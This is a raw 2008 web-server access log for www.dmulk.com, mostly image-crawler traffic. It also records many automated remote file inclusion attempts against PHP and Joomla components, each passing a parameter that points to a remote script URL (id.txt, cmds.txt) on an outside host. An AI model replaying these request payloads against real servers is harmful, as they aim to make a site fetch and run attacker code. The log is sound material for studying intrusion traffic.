66.7.198.92 - - [26/Jan/2008:06:16:44 -0800] "GET /logs/access_080106.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://pucorp.org/id21.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.198.92 - - [26/Jan/2008:06:16:44 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://pucorp.org/id21.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.198.92 - - [26/Jan/2008:06:16:44 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://pucorp.org/id21.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.198.92 - - [26/Jan/2008:06:16:56 -0800] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://pucorp.org/id21.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.212.224.181 - - [26/Jan/2008:06:17:02 -0800] "GET /funny/ HTTP/1.0" 200 792 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.167 - - [26/Jan/2008:06:17:02 -0800] "GET /minamijewelry/html/ HTTP/1.0" 200 13288 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.144 - - [26/Jan/2008:06:17:03 -0800] "GET /funny/?D=A HTTP/1.0" 200 796 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
121.173.130.137 - - [26/Jan/2008:06:17:04 -0800] "GET /logs/access_080106.log//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.173.130.137 - - [26/Jan/2008:06:17:05 -0800] "GET /logs//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.212.224.162 - - [26/Jan/2008:06:17:35 -0800] "GET /funny/?D=D HTTP/1.0" 200 792 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.181 - - [26/Jan/2008:06:17:50 -0800] "GET /drop/ HTTP/1.0" 401 395 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.149 - - [26/Jan/2008:06:17:50 -0800] "GET /logs/?N=A HTTP/1.0" 200 31810 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.181 - - [26/Jan/2008:06:17:51 -0800] "GET /minamijewelry/html/terms.html HTTP/1.0" 200 13534 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
209.172.55.178 - - [26/Jan/2008:06:18:09 -0800] "GET /logs/access_080106.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.55.178 - - [26/Jan/2008:06:18:09 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.55.178 - - [26/Jan/2008:06:18:09 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.212.224.164 - - [26/Jan/2008:06:18:23 -0800] "GET /funny/?N=A HTTP/1.0" 200 792 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
209.172.55.178 - - [26/Jan/2008:06:18:27 -0800] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.212.224.166 - - [26/Jan/2008:06:18:39 -0800] "GET /minamijewelry/html/contact.html HTTP/1.0" 200 12370 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
81.52.143.16 - - [26/Jan/2008:06:19:06 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
81.52.143.16 - - [26/Jan/2008:06:19:26 -0800] "GET /presto/?D=A HTTP/1.1" 200 526 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
217.212.224.164 - - [26/Jan/2008:06:19:27 -0800] "GET /bikes/ HTTP/1.0" 200 2168 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.147 - - [26/Jan/2008:06:19:28 -0800] "GET /minamijewelry/html/testimonials.html HTTP/1.0" 200 12446 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
207.58.141.110 - - [26/Jan/2008:06:19:51 -0800] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.141.110 - - [26/Jan/2008:06:19:51 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.141.110 - - [26/Jan/2008:06:19:51 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.212.224.168 - - [26/Jan/2008:06:20:15 -0800] "GET /backup2/ HTTP/1.0" 401 395 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.162 - - [26/Jan/2008:06:20:15 -0800] "GET /bikes/dteel/ HTTP/1.0" 200 8528 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
89.111.176.108 - - [26/Jan/2008:06:20:17 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.212.224.164 - - [26/Jan/2008:06:20:19 -0800] "GET /minamijewelry/html/clearance.html HTTP/1.0" 200 12258 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
195.242.208.120 - - [26/Jan/2008:06:20:20 -0800] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.208.120 - - [26/Jan/2008:06:20:20 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.208.120 - - [26/Jan/2008:06:20:40 -0800] "GET /logs/access_080106.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.25.169 - - [26/Jan/2008:06:20:48 -0800] "GET /logs/access_080112.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.212.224.181 - - [26/Jan/2008:06:21:03 -0800] "GET /minamijewelry/?D=A HTTP/1.0" 200 2094 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.164 - - [26/Jan/2008:06:21:03 -0800] "GET /backup/ HTTP/1.0" 401 395 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.159 - - [26/Jan/2008:06:21:03 -0800] "GET /bikes/GPS/ HTTP/1.0" 200 661 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.164 - - [26/Jan/2008:06:21:04 -0800] "GET /minamijewelry/html/schedule.html HTTP/1.0" 200 12759 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.164 - - [26/Jan/2008:06:21:35 -0800] "GET /minamijewelry/?D=D HTTP/1.0" 200 2094 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.181 - - [26/Jan/2008:06:21:51 -0800] "GET /minamijewelry/?S=A HTTP/1.0" 200 2094 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.144 - - [26/Jan/2008:06:21:51 -0800] "GET /bikes/GPS/WeSTOC2006/ HTTP/1.0" 200 833 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.149 - - [26/Jan/2008:06:21:51 -0800] "GET /bikes/CreSTOC07/ HTTP/1.0" 200 15280 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.178 - - [26/Jan/2008:06:21:54 -0800] "GET /minamijewelry/html/kids.html HTTP/1.0" 200 19771 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.164 - - [26/Jan/2008:06:22:24 -0800] "GET /bikes/CreSTOC07/?D=A HTTP/1.0" 200 15280 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.147 - - [26/Jan/2008:06:22:38 -0800] "GET /bikes/?D=A HTTP/1.0" 200 2168 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.144 - - [26/Jan/2008:06:22:38 -0800] "GET /bikes/GPS/?D=A HTTP/1.0" 200 661 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.178 - - [26/Jan/2008:06:22:39 -0800] "GET /bikes/CreSTOC07/?D=D HTTP/1.0" 200 15280 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.145 - - [26/Jan/2008:06:22:39 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.147 - - [26/Jan/2008:06:22:40 -0800] "GET /minamijewelry/html/custom.html HTTP/1.0" 200 12705 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.163 - - [26/Jan/2008:06:23:11 -0800] "GET /bikes/CreSTOC07/?S=A HTTP/1.0" 200 15280 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
140.113.4.81 - - [26/Jan/2008:06:23:25 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.212.224.162 - - [26/Jan/2008:06:23:26 -0800] "GET /bikes/GPS/?S=A HTTP/1.0" 200 661 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.159 - - [26/Jan/2008:06:23:26 -0800] "GET /bikes/GPS/?D=D HTTP/1.0" 200 661 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.181 - - [26/Jan/2008:06:23:26 -0800] "GET /bikes/?S=A HTTP/1.0" 200 2168 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.144 - - [26/Jan/2008:06:23:26 -0800] "GET /bikes/?D=D HTTP/1.0" 200 2168 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.168 - - [26/Jan/2008:06:23:26 -0800] "GET /bikes/CreSTOC07/?N=A HTTP/1.0" 200 15280 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.181 - - [26/Jan/2008:06:23:27 -0800] "GET /minamijewelry/html/about.html HTTP/1.0" 200 12859 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.181 - - [26/Jan/2008:06:23:30 -0800] "GET /bikes/CreSTOC07/?S=D HTTP/1.0" 200 15280 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.159 - - [26/Jan/2008:06:23:59 -0800] "GET /bikes/CreSTOC07/?M=A HTTP/1.0" 200 15280 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.181 - - [26/Jan/2008:06:24:14 -0800] "GET /bikes/?M=A HTTP/1.0" 200 2168 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.143 - - [26/Jan/2008:06:24:14 -0800] "GET /bikes/GPS/?M=A HTTP/1.0" 200 661 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.181 - - [26/Jan/2008:06:24:14 -0800] "GET /bikes/?S=D HTTP/1.0" 200 2168 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.159 - - [26/Jan/2008:06:24:14 -0800] "GET /bikes/?N=A HTTP/1.0" 200 2168 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.164 - - [26/Jan/2008:06:24:15 -0800] "GET /bikes/GPS/?S=D HTTP/1.0" 200 661 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.178 - - [26/Jan/2008:06:24:15 -0800] "GET /bikes/CreSTOC07/?M=D HTTP/1.0" 200 15280 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.168 - - [26/Jan/2008:06:24:15 -0800] "GET /bikes/GPS/?M=D HTTP/1.0" 200 661 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.181 - - [26/Jan/2008:06:24:17 -0800] "GET /bikes/GPS/?N=A HTTP/1.0" 200 661 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.147 - - [26/Jan/2008:06:24:47 -0800] "GET /bikes/?M=D HTTP/1.0" 200 2168 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.162 - - [26/Jan/2008:06:25:02 -0800] "GET /_private/ HTTP/1.0" 403 163 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.167 - - [26/Jan/2008:06:25:02 -0800] "GET /bikes/GPS/?N=D HTTP/1.0" 200 661 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.141 - - [26/Jan/2008:06:25:03 -0800] "GET /minamijewelry/html/dream.html HTTP/1.0" 200 18218 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
69.57.128.49 - - [26/Jan/2008:06:25:28 -0800] "GET /logs/access_080104.log///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=www.geocities.com/paddy.only/acmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.128.49 - - [26/Jan/2008:06:25:28 -0800] "GET ///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=www.geocities.com/paddy.only/acmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.128.49 - - [26/Jan/2008:06:25:28 -0800] "GET /logs///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=www.geocities.com/paddy.only/acmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.212.224.144 - - [26/Jan/2008:06:25:52 -0800] "GET /minamijewelry/?S=D HTTP/1.0" 200 2100 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.168 - - [26/Jan/2008:06:25:52 -0800] "GET /?D=A HTTP/1.0" 200 2946 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.147 - - [26/Jan/2008:06:25:53 -0800] "GET /minamijewelry/html/moon.html HTTP/1.0" 200 20921 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
207.58.141.110 - - [26/Jan/2008:06:25:55 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.77.94.81 - - [26/Jan/2008:06:25:55 -0800] "GET /logs/access_071230.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://lorder.sitesled.com/idasc???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.77.94.81 - - [26/Jan/2008:06:25:56 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://lorder.sitesled.com/idasc???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.77.94.81 - - [26/Jan/2008:06:25:56 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://lorder.sitesled.com/idasc???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.212.224.167 - - [26/Jan/2008:06:26:25 -0800] "GET /bikes/CreSTOC07/?N=D HTTP/1.0" 200 15280 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.144 - - [26/Jan/2008:06:26:41 -0800] "GET /bikes/GPS/WeSTOC2006/?D=A HTTP/1.0" 200 833 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.144 - - [26/Jan/2008:06:26:41 -0800] "GET /bikes/?N=D HTTP/1.0" 200 2168 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.178 - - [26/Jan/2008:06:26:41 -0800] "GET /?S=A HTTP/1.0" 200 2946 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.147 - - [26/Jan/2008:06:26:42 -0800] "GET /?S=D HTTP/1.0" 200 2946 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.163 - - [26/Jan/2008:06:27:14 -0800] "GET /minamijewelry/?N=A HTTP/1.0" 200 2094 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.162 - - [26/Jan/2008:06:27:30 -0800] "GET /bikes/GPS/WeSTOC2006/?S=A HTTP/1.0" 200 833 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.159 - - [26/Jan/2008:06:27:30 -0800] "GET /?D=D HTTP/1.0" 200 2946 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.149 - - [26/Jan/2008:06:27:30 -0800] "GET /?M=A HTTP/1.0" 200 2946 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.163 - - [26/Jan/2008:06:27:31 -0800] "GET /bikes/GPS/WeSTOC2006/?S=D HTTP/1.0" 200 833 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.167 - - [26/Jan/2008:06:27:31 -0800] "GET /bikes/GPS/WeSTOC2006/?D=D HTTP/1.0" 200 833 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
64.38.19.90 - - [26/Jan/2008:06:28:14 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.tus-dom-esch.de/templates/l?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.19.90 - - [26/Jan/2008:06:28:15 -0800] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.tus-dom-esch.de/templates/l?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.212.224.147 - - [26/Jan/2008:06:28:19 -0800] "GET /?M=D HTTP/1.0" 200 2946 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.167 - - [26/Jan/2008:06:28:19 -0800] "GET /bikes/GPS/WeSTOC2006/?M=A HTTP/1.0" 200 833 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.159 - - [26/Jan/2008:06:28:19 -0800] "GET /?N=D HTTP/1.0" 200 2946 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.181 - - [26/Jan/2008:06:28:19 -0800] "GET /?N=A HTTP/1.0" 200 2946 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.164 - - [26/Jan/2008:06:28:21 -0800] "GET /bikes/GPS/WeSTOC2006/?N=A HTTP/1.0" 200 833 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.181 - - [26/Jan/2008:06:29:09 -0800] "GET /bikes/GPS/WeSTOC2006/?N=D HTTP/1.0" 200 833 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.162 - - [26/Jan/2008:06:29:09 -0800] "GET /bikes/GPS/WeSTOC2006/?M=D HTTP/1.0" 200 833 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
212.61.66.84 - - [26/Jan/2008:06:29:18 -0800] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.61.66.84 - - [26/Jan/2008:06:29:18 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.212.224.162 - - [26/Jan/2008:06:30:00 -0800] "GET /minamijewelry/html/wind.html HTTP/1.0" 200 20883 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
69.89.25.169 - - [26/Jan/2008:06:30:40 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.25.169 - - [26/Jan/2008:06:30:40 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.25.169 - - [26/Jan/2008:06:30:40 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.212.224.178 - - [26/Jan/2008:06:30:54 -0800] "GET /minamijewelry/html/bird.html HTTP/1.0" 200 20962 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.148 - - [26/Jan/2008:06:31:40 -0800] "GET /minamijewelry/html/flower.html HTTP/1.0" 200 20957 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.143 - - [26/Jan/2008:06:32:29 -0800] "GET /minamijewelry/html/index.html HTTP/1.0" 200 13288 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.167 - - [26/Jan/2008:06:32:31 -0800] "GET /minamijewelry/?M=A HTTP/1.0" 200 2100 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.144 - - [26/Jan/2008:06:33:17 -0800] "GET /minamijewelry/?N=D HTTP/1.0" 200 2094 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.159 - - [26/Jan/2008:06:33:17 -0800] "GET /minamijewelry/?M=D HTTP/1.0" 200 2094 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.145 - - [26/Jan/2008:06:33:18 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.162 - - [26/Jan/2008:06:33:19 -0800] "GET /funny/?S=A HTTP/1.0" 200 792 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.163 - - [26/Jan/2008:06:34:06 -0800] "GET /funny/?S=D HTTP/1.0" 200 796 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.147 - - [26/Jan/2008:06:34:07 -0800] "GET /funny/?M=A HTTP/1.0" 200 792 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.159 - - [26/Jan/2008:06:34:57 -0800] "GET /funny/?N=D HTTP/1.0" 200 796 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.141 - - [26/Jan/2008:06:34:58 -0800] "GET /funny/?M=D HTTP/1.0" 200 796 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
153.19.101.68 - - [26/Jan/2008:06:35:19 -0800] "GET //skin/zero_vote/error.php?dir=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [26/Jan/2008:06:35:20 -0800] "GET //skin/zero_vote/error.php?dir=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [26/Jan/2008:06:35:52 -0800] "GET /index.php?sub=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [26/Jan/2008:06:35:52 -0800] "GET /index.php?sub=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.38.19.90 - - [26/Jan/2008:06:37:33 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.tus-dom-esch.de/templates/l?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.19.90 - - [26/Jan/2008:06:37:34 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.tus-dom-esch.de/templates/l?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.19.90 - - [26/Jan/2008:06:37:34 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.tus-dom-esch.de/templates/l?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.61.66.84 - - [26/Jan/2008:06:40:03 -0800] "GET /logs/access_080106.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.213.194.42 - - [26/Jan/2008:06:41:01 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.25.34 - - [26/Jan/2008:06:41:18 -0800] "GET /tmp/?S=A HTTP/1.0" 200 981 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.229.45.126 - - [26/Jan/2008:06:44:21 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://szom.bravehost.com/sample.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.229.45.126 - - [26/Jan/2008:06:44:21 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://szom.bravehost.com/sample.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.229.45.126 - - [26/Jan/2008:06:44:22 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://szom.bravehost.com/sample.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
